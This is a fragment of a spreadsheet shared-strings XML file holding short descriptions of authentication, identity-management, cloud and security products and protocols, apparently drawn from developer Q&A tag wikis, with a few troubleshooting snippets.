OneDrive is part of the Windows Live range of online services and allows users to keep the files private, share them with contacts, or make the files public.</t>
  </si>
  <si>
    <t>You can use the Cascades UI and platform APIs to do almost anything you need to create great apps, including:
Develop your UI in C++, Qt Modeling Language (QML), or both
Take advantage of core UI controls, or expand on them and create your own custom controls
Communicate over mobile and Wi-Fi networks
Record and play media files
Store and retrieve data
Manage certificates and use cryptographic protocols
Cascades Builder
Cascades Builder is built into the QNX Momentics IDE and lets you design your UI using a visual interface.</t>
  </si>
  <si>
    <t xml:space="preserve">
Azure IoT Hub is a fully managed service that enables reliable and
  secure bidirectional communications between millions of IoT devices
  and a solution back end.</t>
  </si>
  <si>
    <t>The Service Bus relay facilitates integration by enabling developer to securely expose Windows Communication Foundation (WCF) services that reside within a corporate enterprise network to the public cloud, without having to open up a firewall connection or requiring intrusive changes to a corporate network infrastructure.</t>
  </si>
  <si>
    <t>django-allauth is a set of pluggable django apps for authentication, registration, account management as well as 3rd party (social) account authentication</t>
  </si>
  <si>
    <t>A software architecture that support single instance for multiple clients, regarded as an essential attribute of cloud computing and is highly secure, cost-efficient, performant and scalable.</t>
  </si>
  <si>
    <t>Asset Fingerprint is a Ruby on Rails plugin (supports Rails versions 2.2.x &amp; 2.3.x, for Rails 3+ see Rails Version Support) to fingerprint asset files using MD5 check-sum (or time-stamp or anything else you like) in file names to improve cache-ability compared to the default Rails asset caching strategy.</t>
  </si>
  <si>
    <t>It lets you easily provision, manage, and deploy Secure Sockets Layer/Transport Layer Security (SSL/TLS) certificates for use with AWS services.</t>
  </si>
  <si>
    <t>Hypertext Transfer Protocol Secure (https) is a widely used communications protocol for secure communication over a computer network, with especially wide deployment on the Internet.</t>
  </si>
  <si>
    <t>The BlackBerry Dynamics SDK provides a powerful set of tools that allow you to focus on building useful productivity apps rather than learning how to secure, deploy, and manage those apps.</t>
  </si>
  <si>
    <t>Cloud Powered: Visula Studio App Center makes it easy for developers to do everything an app needs to do
Successful mobile apps are powered by an enterprise-grade cloud backend that brings scalability, security, data and turnkey mobile features such as authentication and offline sync to apps.</t>
  </si>
  <si>
    <t>AWS IoT is a managed cloud platform that lets connected devices easily and securely interact with cloud applications and other devices.</t>
  </si>
  <si>
    <t>LoginRadius is a unified API platform enabling customers to implement social login, capture social data, enable social sharing, and more</t>
  </si>
  <si>
    <t>Windows Azure Mobile Apps provides a turnkey backend solution to power your mobile app by allowing you to easily add  structured storage, user authentication and push notifications to your iOS, Android, Cordova, Windows (UWP) and Windows Phone (8.1) apps.</t>
  </si>
  <si>
    <t>Amazon API Gateway is a fully managed service that makes it easy for developers to create, publish, maintain, monitor, and secure APIs at any scale.</t>
  </si>
  <si>
    <t>Identity Experience Framework
A fully configurable, policy-driven, cloud-based Azure platform that orchestrates trust between entities (broadly Claims Providers) in standard protocol formats such as OpenIDConnect, OAuth, SAML, WSFed, and a few non-standard ones (for example REST API-based system-to-system claims exchanges).</t>
  </si>
  <si>
    <t>Gigya is a provider of customer identity access management and social media integration tools that bind several social media platforms together.</t>
  </si>
  <si>
    <t>Connect to your enterprise systems - with Mobile Apps you can add corporate sign on in minutes, and connect to your enterprise on-premises or cloud resources.</t>
  </si>
  <si>
    <t>The browser also claims to improve online privacy by sharing less data with advertising customers.</t>
  </si>
  <si>
    <t>Once the secure elements have each generated their key pairs, the
  corresponding public keys are sent to the customers Google Cloud
  account and stored securely in the Cloud IoT Core device manager.</t>
  </si>
  <si>
    <t>OpenMobster is an open source Enterprise Backend (Mbaas) for Mobile Apps which provides  Automatic bidirectional data sync between the devices and the Cloud which can be deployed privately (on-premise) within your Enterprise.</t>
  </si>
  <si>
    <t>In particular, Privacy by Design and privacy-preserving technologies are critically important for a public identity ledger where correlation can take place on a global scale.</t>
  </si>
  <si>
    <t>Perfect Developer:
Unlike most other formal tools, Perfect Developer delivers high productivity by generating a very high proportion of software verification proofs without user intervention, using state-of-the-art automated reasoning technology.</t>
  </si>
  <si>
    <t>A3M (Account Authentication &amp; Authorization) is a CodeIgniter 2.x package that leverages bleeding edge web technologies like OpenID and OAuth to create a user-friendly user experience.</t>
  </si>
  <si>
    <t>Users may create accounts with their preferred OpenID identity providers, and then use those accounts as the basis for signing on to any website which accepts OpenID authentication
- Wikipedia</t>
  </si>
  <si>
    <t xml:space="preserve"> is a framework and a hostable component that allows implementing single sign-on and access control for modern web applications and APIs using protocols like OpenID Connect and OAuth2.</t>
  </si>
  <si>
    <t>About
Globus Toolkit is a fundamental enabling technology for the "Grid," letting people share computing power, databases, and other tools securely online across corporate, institutional, and geographic boundaries without sacrificing local autonomy.</t>
  </si>
  <si>
    <t>By tying the accounts together with a single identity, account management becomes simplified and the use of a single username+password combination across many dissimilar systems becomes possible.</t>
  </si>
  <si>
    <t>Cilium is open source software for transparently securing the network connectivity between application services deployed using Linux container management platforms like Docker and Kubernetes.</t>
  </si>
  <si>
    <t>Django-rest-auth provides a set of REST API endpoints for Authentication and Registration
Features
User Registration with activation
Login/Logout
Retrieve/Update the Django User model
Password change
Password reset via e-mail
Social Media authentication
Resources
Documentation:
https://django-rest-auth.readthedocs.io/en/latest/
GitHub repo: https://github.com/Tivix/django-rest-auth
jQuery demo: https://github.com/Tivix/django-rest-auth/tree/master/demo
AngularJS demo: https://github.com/Tivix/angular-django-registration-auth</t>
  </si>
  <si>
    <t>Bosun - Policy Manager GEri provides the basic management of cloud resources based on rules, as well as management of the corresponding resources within the FIWARE Cloud Instance like actions based on physical monitoring or infrastructure, security monitoring of resources and services or whatever that could be defined by a fact, actions and rules.</t>
  </si>
  <si>
    <t>Identity Management
Oracle offers a complete identity management platform that enables enterprises to improve security, enforce compliance, lower administration costs, and leverage extreme scalability with tightly integrated components that speed deployment and simplify user identity administration and access management.</t>
  </si>
  <si>
    <t>Spring Social is an extension of the Spring Framework that enables applications to connect with Software-as-a-Service providers such as Twitter, Facebook and other OAuth authentication based APIs.</t>
  </si>
  <si>
    <t>FTPS (also known as FTP-ES, FTP-SSL and FTP Secure) is an extension to the commonly used File Transfer Protocol (FTP) that adds support for the Transport Layer Security (TLS) and the Secure Sockets Layer (SSL) cryptographic protocols.</t>
  </si>
  <si>
    <t>OpenIddict is based on ASP.NET Core Identity (for user management) and relies on AspNet.Security.OpenIdConnect.Server to control the OpenID Connect authentication flow.</t>
  </si>
  <si>
    <t>IBM MobileFirst Platform Foundation can help reduce both app development and maintenance costs, improve time-to-market and enhance mobile app governance and security.</t>
  </si>
  <si>
    <t>IBM Worklight Foundation can help reduce both app development and maintenance costs, improve time-to-market and enhance mobile app governance and security.</t>
  </si>
  <si>
    <t>Media Services is based on REST APIs that enable you to securely upload, store, encode and package video or audio content for both on-demand and live streaming delivery to various clients (for example, TV, PC, and mobile devices).</t>
  </si>
  <si>
    <t>Solutions built on Android for Work include these benefits:
Security and Data Separation
Support for both employee-owned and company-provisioned devices
Remote Management
Seamless User Experience
Simplified Application Deployment
Divide Productivity Suite
Google offers an out-of-the-box Android for Work solution with its Google Apps for Work productivity suite.</t>
  </si>
  <si>
    <t>It is based on simplicity, object-oriented best practices, corporate friendly licensing, and a rigorously tested agile codebase with a main focus on building more secure, reliable, and modern Web 2.0 applications &amp; web services.</t>
  </si>
  <si>
    <t>Tivoli Identity Manager, now called Security Identity Manager, is an identity management solution that provides password management, user provisioning, and auditing capabilities across the enterprise.</t>
  </si>
  <si>
    <t>The Realm Object Server synchronizes Realms between devices, provides authentication and access control services for Realms, and offers backend integrations and server-side event handling.</t>
  </si>
  <si>
    <t>Using Intune, organizations can provide their employees with access to corporate applications, data, and resources from virtually anywhere on almost any device, while helping to keep corporate information secure.</t>
  </si>
  <si>
    <t>HootSuite is a social media management system for organizations to engage, measure and collaborate across multiple social networks from one secure web and mobile-based dashboard.</t>
  </si>
  <si>
    <t>The Session Initiation Protocol (SIP) is a signaling communications protocol, widely used for controlling multimedia communication sessions such as voice and video calls over Internet Protocol (IP) networks.</t>
  </si>
  <si>
    <t>An Apple ID is the login you use for just about everything you do with Apple, including using iCloud to store your content, downloading apps from the App Store, and buying songs, movies, and TV shows from the iTunes Store.</t>
  </si>
  <si>
    <t>The hybrid flow is a combination of authorization code flow and hybrid flow and can be utilized for confidential clients.</t>
  </si>
  <si>
    <t>The advantage of a registration approach is the ability to add
  translations to models on a per-app basis.</t>
  </si>
  <si>
    <t>OIDC (OpenID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t>
  </si>
  <si>
    <t>As well as creating cloud hosting infrastructure, OnApp Cloud software provides functionality for the management of cloud resources, including virtual machines, hypervisors, SANs and networks; end user accounts, permissions and limits; pricing and billing calculations for cloud resources; and failover between different hypervisors in the cloud.</t>
  </si>
  <si>
    <t>Persona was launched in July 2011 and shares some of its goals with some similar authentication systems like OpenID or Facebook Connect, but it is different in several ways:
it uses email addresses as identifiers 
it is more focused on privacy
is intended to be fully integrated in the browser.</t>
  </si>
  <si>
    <t>Microsoft Azure Identity Libraries powered by Azure Active Directory
The Azure Active Directory Authentication Libraries (ADAL) gives you the ability to add support for Microsoft's cloud identity APIs to your application, including support for Office365 and Work Accounts.</t>
  </si>
  <si>
    <t>Windows Azure Service Configuration Schema (.cscfg File)
The service configuration file specifies the number of role instances to deploy for each role in the service, the values of any configuration settings, and the thumbprints for any certificates associated with a role.</t>
  </si>
  <si>
    <t>From Facebook Developers:
Authentication gives your app the ability to know the identity of a
  Facebook user, and to read and write data via Facebook's APIs.</t>
  </si>
  <si>
    <t>Kentico Cloud is a SaaS solution built on a modern technology stack - it's highly available, it scales automatically, and it's secure.</t>
  </si>
  <si>
    <t>While it can manage windows and the Active Directory user account and authorization processes, UMRA also offers delegation of user account management and compliance with user monitoring and reporting.</t>
  </si>
  <si>
    <t>The OAuth 2.0 authorization framework enables a third-party
   application to obtain limited access to an HTTP service, either on
   behalf of a resource owner by orchestrating an approval interaction
   between the resource owner and the HTTP service, or by allowing the
   third-party application to obtain access on its own behalf.</t>
  </si>
  <si>
    <t>You cannot install apps FROM the microsoft app store (not even with IoT Core Pro), but you can request permissions to DOWNLOAD your store app from the developer dashboard (the real appx package, signed with MS store codesigning cert) if you are a registered Pro (OEM) customer...</t>
  </si>
  <si>
    <t>WeChat claims to provide a social networking platform that emphasizes user privacy and fast response performance.</t>
  </si>
  <si>
    <t>By leveraging Box's RESTful API, you can add simple, yet secure file management, sharing, and collaboration to your app.</t>
  </si>
  <si>
    <t>Using SAML, an online service provider can contact a separate online identity provider to authenticate users who are trying to access secure content.</t>
  </si>
  <si>
    <t>The User Communication Integration Protocol is intended for user self-services such as adjustments, account refill, account enquiries and fetching account details.</t>
  </si>
  <si>
    <t>MediaFire offers free and secure cloud storage so users can store and share data with their customers, colleagues, friends, and family.</t>
  </si>
  <si>
    <t>It is owned and maintained by Bitrix Inc.
Products
Bitrix24 is a highly secure, turnkey intranet solution for small and medium-sized businesses designed for effective collaboration, communication, social networking, workflow and knowledge management.</t>
  </si>
  <si>
    <t>MobileIron is a software solution for the management of mobile devices such as smartphones and tablet computers in an enterprise environment, as well as the secure mobile access to enterprise data.</t>
  </si>
  <si>
    <t>I think there are really two core buckets of approaches to distribution of the private key to a given device:
Distribution / initialization at manufacture / late-manufacture stage (secure)
Distribution post-manufacture (e.g.</t>
  </si>
  <si>
    <t>Examples using google-api-python-client library to invoke PubSub APIs
Using credentials from a service account json file
The following example shows you how you can use a service account to authenticate with Google Cloud PubSub APIs and invoke them.</t>
  </si>
  <si>
    <t>Pusher is a hosted API for quickly, easily and securely adding scalable realtime functionality to web and mobile apps.</t>
  </si>
  <si>
    <t>Its a new way of building websites and apps that delivers better performance, higher security, lower cost of scaling, and a better developer experience.</t>
  </si>
  <si>
    <t>Pocket Network(POKT) provides a decentralized solution for developers to easily connect any app, with any blockchain, on any device.</t>
  </si>
  <si>
    <t>Windows Azure Active Directory Access Control -- also known as Access Control Service (ACS) 2.0 -- is a service that handles authentication and authorization for web application and services, either directly or through integration with widely used authentication systems such as Facebook, Google and Windows Live.</t>
  </si>
  <si>
    <t>Jailkit is known to be used in network security appliances from several leading IT security firms, internet servers from several large enterprise organizations, internet servers from internet service providers, as well as many smaller companies and private users that need to secure cvs, sftp, shell or daemon processes.</t>
  </si>
  <si>
    <t>About
GridFTP is a high-performance, secure, reliable data transfer protocol optimized for high-bandwidth wide-area networks.The GridFTP protocol is based on FTP, the highly-popular Internet file transfer protocol.</t>
  </si>
  <si>
    <t>Features
User registration and login
Self-serve password reset and account email verification
User account settings
Groups and roles
Fine-grained access control with access conditions
Admin user creation and management
Sleek, responsive frontend interface
Primary Objectives
Create a fully-functioning user management script that can be set up in just a few minutes
Make it easy for users to quickly adapt the code for their needs
Introduce novice developers to best practices such as separation of concerns and DRY programming
Introduce novice developers to modern constructs such as front-end controllers, RESTful URLs, namespacing, and object-oriented modeling
Build on existing, widely used server- and client-side components
Clean, consistent, and well-documented code</t>
  </si>
  <si>
    <t>Linkerd is a transparent service mesh, designed to make modern applications safe and sane by transparently adding service discovery, load balancing, failure handling, instrumentation, and routing to all inter-service communication.</t>
  </si>
  <si>
    <t>One of the core features of MetaMask is a secure identity vault, which lets you manage your identities on different sites and sign blockchain transactions.</t>
  </si>
  <si>
    <t>Built using the same global, reliable infrastructure Twitter uses, Digits will verify the users phone number with a simple customizable user interface that easily integrates into your app.</t>
  </si>
  <si>
    <t>Amazon Chime is a secure, real-time, unified communications service that delivers high-quality audio and video through an application that stays in sync across multiple devices.</t>
  </si>
  <si>
    <t>OAuth 2.0 focuses on client developer simplicity while providing specific authorization flows for web applications, desktop applications, mobile phones, and living room devices.</t>
  </si>
  <si>
    <t>Chrome Apps deliver an experience as capable as a native app, but as safe as a web page.</t>
  </si>
  <si>
    <t>Registry Layer - optional layer organizing secure communication
between the domain and the DAL by using a separate service.</t>
  </si>
  <si>
    <t>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</si>
  <si>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By using a gateway, organizations can keep databases and other data sources on their on-premises networks, yet securely use that on-premises data in cloud services.</t>
  </si>
  <si>
    <t>Whereas a general-purpose OS (GPOS) aims to protect the I/O space from errant user processes and to control access to those resources, in an RTOS which generally runs a single fixed application, it is normally the application developer who controls access to a resource (via mutex locks, or server tasks for examples), and where available, MMU access control works by assigning access rights on a per thread or process basis.</t>
  </si>
  <si>
    <t>I am using
@reboot DISPLAY=:0 /usr/bin/java -jar /home/pi/Downloads/GUI1.jar &gt; /home/pi/Downloads/cron.log 2&gt;&amp;1
The cron.log says (Error) and no GUI is shown 
Invalid MIT-MAGIC-COOKIE-1 keyInvalid MIT-MAGIC-COOKIE-1 keyException in thread "main"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java.lang.reflect.Method.invoke(Method.java:498)
at sun.launcher.LauncherHelper$FXHelper.main(LauncherHelper.java:767)
Caused by: java.lang.UnsupportedOperationException: Unable to open DISPLAY
at com.sun.glass.ui.gtk.GtkApplication.&lt;init&gt;(GtkApplication.java:68)
at com.sun.glass.ui.gtk.GtkPlatformFactory.createApplication(GtkPlatformFactory.java:41)
at com.sun.glass.ui.Application.run(Application.java:146)
at com.sun.javafx.tk.quantum.QuantumToolkit.startup(QuantumToolkit.java:257)
at com.sun.javafx.application.PlatformImpl.startup(PlatformImpl.java:211)
at com.sun.javafx.application.LauncherImpl.startToolkit(LauncherImpl.java:675)
at com.sun.javafx.application.LauncherImpl.launchApplicationWithArgs(LauncherImpl.java:337)
at com.sun.javafx.application.LauncherImpl.launchApplication(LauncherImpl.java:328)
... 5 more
Update 
I created a simple java app jar file which print outs "Hello World!".</t>
  </si>
  <si>
    <t>Virtual Member Manager (formerly known as WebSphere Identity Manager - WIM) is a shared component which combines the current functionalities of the WebSphere Member Manager(WMM), the WAS User Registry, and a subset of the secure administrations functions.</t>
  </si>
  <si>
    <t>Balanced combination of advanced code editor, reliable dbg debugger, productive database connectivity client and fast and secure deployment abilities make PhpED a good solution for the most sophisticated developer needs.</t>
  </si>
  <si>
    <t>Intrusive containers are special containers that offer better performance and exception safety guarantees than non-intrusive containers (like STL containers)</t>
  </si>
  <si>
    <t>Transport Layer Security pre-shared key ciphersuites (TLS-PSK) is a set of cryptographic protocols that provide secure communication based on pre-shared keys (PSKs).</t>
  </si>
  <si>
    <t>Active Directory Federation Services (ADFS) is a standards-based web Single Sign-On federated identity which implements claims based authentication across forests.</t>
  </si>
  <si>
    <t>Packaged apps deliver an experience as capable as a native app, but as safe as a web page.</t>
  </si>
  <si>
    <t>The Secure Gateway service provides you with a secure way to access your on-premises or cloud data from your Bluemix application through a secure passage.</t>
  </si>
  <si>
    <t>Android Security Overview
Android has been expanding its market share rapidly as a modern mobile operating system.</t>
  </si>
  <si>
    <t>In addition, a SOA governance infrastructure should be in place to support the service delivery lifecycle, which includes a registry of services to enable service discovery.</t>
  </si>
  <si>
    <t>You can register each PI unit in the rails app via the rails console or create the routes and controllers for it in the rails app if you want to be thorough.</t>
  </si>
  <si>
    <t>The other way you could go is use IAM and service accounts as security and have the device speak directly to one of the other services like Cloud Storage.</t>
  </si>
  <si>
    <t>The platform provides an API and runtime environment for developing and running enterprise software, including network and web services, and other large-scale, multi-tiered, scalable, reliable, and secure network applications.</t>
  </si>
  <si>
    <t>When tied into an account feed such as an HR system, ITIM can provision and revoke accounts automatically as employees are hired, move within the company, and leave the company.</t>
  </si>
  <si>
    <t>Enterprise Gateway
Securely connect your legacy enterprise firewalled systems to each other, or to cloud and web-based services, mobile applications and the Internet of Things.</t>
  </si>
  <si>
    <t>A private cloud is designed to offer the same features and benefits of public cloud systems, but removes a number of objections to the cloud computing model including control over enterprise and customer data, worries about security, and issues connected to regulatory compliance.</t>
  </si>
  <si>
    <t>Use an existing API, or design a new API; then apply security controls, set rate limits, test APIs in place, and finally publish these "managed APIs" on Bluemix--either to yourself or to select developer organizations--or to app developers outside of Bluemix.</t>
  </si>
  <si>
    <t>zscaler is a information security company that provides Internet security, web security, next generation firewalls, sandboxing, SSL inspection, antivirus, vulnerability management and granular control of user activity in cloud computing, mobile and Internet of things environments.</t>
  </si>
  <si>
    <t>Azure App Service Web Apps (formerly known as Azure Web Sites) allow users to concentrate on just Application and Data; leaving the rest of the layers like platform, run-time, firewall etc.</t>
  </si>
  <si>
    <t>Solace runs in public and private clouds, supports open APIs and protocols like JMS, MQTT, Paho, OpenMAMA and REST, and offers APIs for popular programming languages.</t>
  </si>
  <si>
    <t>Developers can quickly and easily call backend JasperReports Server services using REST calls for common functions such as user authentication, data connectivity, repository services and more.</t>
  </si>
  <si>
    <t>Active Directory Federation Services (ADFS for short) is a standards-based Web Single Sign-On federated identity which implements claims based authentication across forests.</t>
  </si>
  <si>
    <t>Microsoft Azure Sentinel is a proprietary cloud-native SIEM (Security Information and Event Management) software that provides security analytics for an enterprise application.</t>
  </si>
  <si>
    <t>Built on a secure, enterprise-ready technology stack that supports secure Internet protocols such as OAuth, Banks can start using Open Bank Project in sandbox mode for innovation programs or proof of concepts with startups and then quickly transition to a production configuration in which OBP interacts with the core banking systems of the bank.</t>
  </si>
  <si>
    <t>HybridAuth's goal is to act as an abstract API between your application and various social APIs and identities providers such as Facebook, Twitter, MySpace and Google.</t>
  </si>
  <si>
    <t>Zentyal can act as a gateway, Network Infrastructure Manager, Unified Threat Manager, office server, Unified communications server or a combination of them.</t>
  </si>
  <si>
    <t>The goal of HybridAuth is to act as an abstract API between your application and various social APIs and identities providers such as Facebook, Twitter, MySpace and Google.</t>
  </si>
  <si>
    <t>There are two ways for applications to communicate with the Customer Account Data API:  REST (RESTful Web Services) and SFTP (SSH File Transfer Protocol).</t>
  </si>
  <si>
    <t>I deploy (Build -&gt; Deploy Solution) and I get this error message:
Error DEP0700: Registration of the app failed.</t>
  </si>
  <si>
    <t>Depending on what you need to do, you could develop a proxy service which will be the go-between for the other applications - 
This proxy service will be the only service  that will connect to the Arduino, and then it will become the orchestrator for the other service that need to interact with the device.</t>
  </si>
  <si>
    <t>WARNING: LONG TEXT AHEAD
Let me explain my findings so far:
Functions
Advantages
single solution approach - solving the scenario with a single service
built-in authorization
organization - saving user's files to separate folders inside ADLS
HTTP endpoint - to send data only a POST is required
cheap &amp; pay-as-you-go - charged per request
Disadvantages
bindings &amp; dependencies - Functions doesn't have ADLS bindings.</t>
  </si>
  <si>
    <t>IdentityServer 3 (IdSrv3) is a .NET/Katana-based framework and hostable component that allows implementing single sign-on and access control for modern web applications and APIs using protocols like  Connect and OAuth2.</t>
  </si>
  <si>
    <t>Some useful resources to start programming against the XML and REST API of Exact Online:
Exact Online Developer center;
OAuth 2, explaining the authentication protocol used.</t>
  </si>
  <si>
    <t>Azure Active Directory B2C
Azure AD B2C is a cloud identity management solution for your web and mobile applications.</t>
  </si>
  <si>
    <t>WIF enables .NET developers to externalize identity logic from their application, improving developer productivity, enhancing application security, and enabling interoperability.</t>
  </si>
  <si>
    <t>Secure service-to-service authentication with strong identity assertions between services in a cluster.</t>
  </si>
  <si>
    <t>By using Windows Azure SQL Database, you can easily provision and deploy relational database solutions to the cloud, and take advantage of a distributed data center that provides enterprise-class availability, scalability, and security with the benefits of built-in data protection and self-healing.</t>
  </si>
  <si>
    <t>OAuth Bearer token auth for REST Services
Integrated Browser App to REST Service token propagation
Admin REST API
OAuth 2.0 Grant requests
CORS Support
CORS Web Origin management and validation
Completely centrally managed user and role mapping metadata.</t>
  </si>
  <si>
    <t>Azure App Service Web Apps (formerly known as Azure Web Sites) allow users to concentrate on just Application and Data; leaving the rest of the layers like platform, run-time, firewall, etc.</t>
  </si>
  <si>
    <t>The WSO2 Identity Server decreases identity management and entitlement management administration burden by including role base access control (RBAC) convention, fine-grained policy based access control, and SSO bridging.</t>
  </si>
  <si>
    <t>It does not provide many features over and above RDF storage and SPARQL queries, but if your are looking for a scalable, secure, fast and efficient RDF store, then 4store should be on your shortlist.</t>
  </si>
  <si>
    <t>Hybrid flow
Authorization code flow is ideal for confidential clients.</t>
  </si>
  <si>
    <t>Asset Links is a protocol to securely capture statements made by digital assets such as web sites or mobile apps about their relationship with other digital assets.</t>
  </si>
  <si>
    <t>The most significant benefit of Tunneling is that it allows for the creation of VPNs over public data networks to provide cost savings for both end users, who do not have to create dedicated networks, and for Service Providers, who can leverage their network investments across many VPN customers.</t>
  </si>
  <si>
    <t>Then there are optional packages like email, which lets your app send emails, or the Meteor Accounts series (account-password, accounts-facebook, accounts-ui, and others) which provide a full-featured user account system that you can drop right into your app.</t>
  </si>
  <si>
    <t>Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote shell services or command execution and other secure network services between two networked computers that it connects via a secure channel over an insecure network: a server and a client (running SSH server and SSH client programs, respectively).</t>
  </si>
  <si>
    <t>These are the resources that I have:
App Service plan
App Service
Network interface
Network security group
Public IP address
Virtual network
Storage account
Azure Cosmos DB account
Device Provisioning Service
Event Hubs Namespace
App Service
App Service plan
IoT Hub
Key vault
Logic app
Azure Maps Account
API Connection
Disk
Storage account (2)
Stream Analytics job
Time Series Insights environment
Time Series Insights event source
Virtual machine</t>
  </si>
  <si>
    <t>Good one about system service application
WSO2 signing system service app
Seems that system service app is not for us.</t>
  </si>
  <si>
    <t>Service discovery protocols are network protocols which allow automatic detection of devices and services offered by these devices on a computer network.</t>
  </si>
  <si>
    <t>The Customer Account Data API provides Intuit Partner Platform applications the ability to access data stored in financial institutions.</t>
  </si>
  <si>
    <t>Integrated Single Sign On (SSO) and Identity Manager for browser apps and RESTful web services.</t>
  </si>
  <si>
    <t>Use REST APIs to automatically manage the registration, deployment, and operation of devices at scale.</t>
  </si>
  <si>
    <t>Common Data Service (CDS) for Apps lets you securely store and manage data that's used by business applications.</t>
  </si>
  <si>
    <t>Multi-cast DNS and DNS service discovery provide a convient ways for devices and services to register themselves, and to discover other network-based services without relying on centrally administered services.</t>
  </si>
  <si>
    <t>This includes what used to be called hosted services, along with platform services for storage, database, caching, communication, identity, etc.</t>
  </si>
  <si>
    <t>Cisco Unified Communication Manager (Unified CM) exposes sophisticated call control of IP telephony devices and soft-clients via the Computer Telephony JTAPI interface.</t>
  </si>
  <si>
    <t>DirectControl, through Centrify's patented Zone technology, allows enterprises to easily establish global UNIX unique identities, centrally manage exceptions on legacy systems, separate identities from access management and delegate administration.</t>
  </si>
  <si>
    <t>It processes big data in-motion in a way that is highly scalable, highly performant, fault tolerant, stateful, secure, distributed, and easily operable.</t>
  </si>
  <si>
    <t>Azure Front Door Service provides a scalable and secure entry point for fast delivery of your global web applications.</t>
  </si>
  <si>
    <t>Alternative Definitions:
OpenMobster, is an open source Mobile Backend As a Service that can
be deployed privately (on-premise) within your Enterprise
OpenMobster, is an open source MEAP (Mobile Enterprise Application
Platform).</t>
  </si>
  <si>
    <t>Aug. 2017
As a workaround, opening a browser to the url https://assistant.google.com/services/auth/handoffs/auth/start?provider=MYPROJECTID_dev&amp;return_url=https://some.useless.url/ and going thru the OAuth flow using the browser somehow enables the next OAuth flow initialization coming from the Google Home app to succeed.</t>
  </si>
  <si>
    <t>The Azure Active Directory Authentication Libraries (ADAL) gives you the ability to add support for Microsoft's cloud identity APIs to your application, including support for Office365 and Work Accounts.</t>
  </si>
  <si>
    <t>Designed specifically to work with Hypertext Transfer Protocol (HTTP), OAuth essentially allows access tokens to be issued to third-party clients by an authorization server, with the approval of the resource owner, or end-user.</t>
  </si>
  <si>
    <t>Adyen has designed an online payment solution that offers maximum control by offering single screen payment pages, one-click payments, and A/B testing.</t>
  </si>
  <si>
    <t>TrustZone solutions need several components,
A TrustZone CPU
A secure boot mechanism
Bus control
Secure world software
Reference:
ARM Trusted firmware on github
ARM TrustZone site
Security extensions on wikipedia.</t>
  </si>
  <si>
    <t>About
Keycloak is an open source Identity and Access Management solution aimed at modern applications and services.</t>
  </si>
  <si>
    <t>In general, if youre building a platform or marketplace that needs to
  pay third-parties or building applications that help Stripe users do
  more with their account or their data, Connect is likely the right
  solution for you.</t>
  </si>
  <si>
    <t>It is part of Microsoft's wider identity and access management strategy which includes Active Directory Federation Services and Windows Azure Access Control Services.</t>
  </si>
  <si>
    <t>Customer Information manager (CIM) is a tool developed by Authorize.Net to store your customer information, such as credit card numbers, into a profile, the new service is PCI compliant and has an API to connect.</t>
  </si>
  <si>
    <t>Nimble is based on Apache shiro security framework
Features
Out of the box support for authentication and authorization
Login
Registration
Forgot password
UI for managing Administrators
UI for managing users
UI for managing user groups
UI for managing roles
UI for assigning roles and permissions to users and groups
Documentation:
http://snimavat.github.io/nimble/index.html
http://grails.org/plugin/nimble
Github
Demo</t>
  </si>
  <si>
    <t>QuickBlox is a proprietary set of client-server solutions that allows you to build more powerful, engaging and secure mobile apps.</t>
  </si>
  <si>
    <t>The Customer Account Data API is part of the Intuit Partner Platform that provides developers access to end-user financial account and transactional information.</t>
  </si>
  <si>
    <t>The Customer Account Data API is part of the Intuit Partner Platform that provides developers access to end-user financial account and transactional information</t>
  </si>
  <si>
    <t>OAuth (Open Authorization) is an open protocol framework to allow secure API authorization in a simple and standardized way for desktop, mobile and web applications.</t>
  </si>
  <si>
    <t>This lets you use existing corporate identities to grant secure access to AWS resources, such as Amazon S3 buckets, without creating new AWS identities for those users.</t>
  </si>
  <si>
    <t>Different online services have different ways of handling accounts and authentication, so the account manager uses pluggable authenticator modules for different account types.</t>
  </si>
  <si>
    <t>A users health information is stored in a centralized and secure location and the user decides which data should be shared with your app.</t>
  </si>
  <si>
    <t>Managed file transfer ("MFT") refers to a software or a service that manages the secure transfer of data from one computer to another through a network (e.g., the Internet).</t>
  </si>
  <si>
    <t>Role-based authorization policy specifies access in terms of user roles that reflect an application's authorization requirements.</t>
  </si>
  <si>
    <t>DTR(Docker Trusted Registry) allows you to store and manage your Docker images on-premises.</t>
  </si>
  <si>
    <t>Firecracker is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant containers and functions-based services.</t>
  </si>
  <si>
    <t>This solution can help save time by automating the set-up of an environment for running secure and scalable workloads while implementing an initial security baseline through the creation of core accounts and resources.</t>
  </si>
  <si>
    <t>It also provides a process for end-users to authorize third-party access to their server resources without sharing their credentials OAuth 2.0 is the next evolution of the OAuth protocol and is not backwards compatible with OAuth 1.0.</t>
  </si>
  <si>
    <t>Computer Associates SiteMinder is a highly scalable solution that provides best practice identity and access management
components for Web single sign-on, authentication, authorization, auditing and administration.</t>
  </si>
  <si>
    <t>Thus, multiple users can share the network resources and it provides a secure/ reliable connection among the virtually connected nodes.</t>
  </si>
  <si>
    <t>The problem with Gmail (and many others mail services) might be with the security, check this: 
https://support.google.com/accounts/answer/6010255?hl=en
You can change account access for less secure apps or enable the 2 step verification.</t>
  </si>
  <si>
    <t>A federation server on one side (the Accounts side) authenticates the user through the standard means in Active Directory Domain Services and then issues a token containing a series of claims about the user, including its identity.</t>
  </si>
  <si>
    <t>Oracle Identity Manager is a powerful and flexible enterprise identity management system that automatically manages users' access privileges within enterprise IT resources.</t>
  </si>
  <si>
    <t>ASP.NET role management helps you to manage authorization, allowing you to specify which resources various users in your application are allowed to access.</t>
  </si>
  <si>
    <t>Rolify is a very simple Roles library without any authorization enforcement supporting scope on resource object.</t>
  </si>
  <si>
    <t>DTR allows organizations to securely store and manage Docker Images behind private firewalls and security standards.</t>
  </si>
  <si>
    <t>The Service Bus allows developer to securely control who can access these services at a fine-grain level.</t>
  </si>
  <si>
    <t>This makes registration faster and more secure, and reduces support costs for forgotten usernames and passwords.</t>
  </si>
  <si>
    <t>Pitney Bowes Developer Portfolio contains 
Mailing and Shipping APIs and softwares
Global E-Commerce Solutions and APIs
Data / Location Intelligence / Customer Engagements API
For specific subprojects try to include corresponding tags like [api], [o-auth], [e-commerce], [location], [geo-location] etc</t>
  </si>
  <si>
    <t>Zscaler is a global cloud-based information security company that provides Internet security, web security, next generation firewalls, sandboxing, SSL inspection, antivirus, vulnerability management and granular control of user activity in cloud computing, mobile and Internet of things environments.</t>
  </si>
  <si>
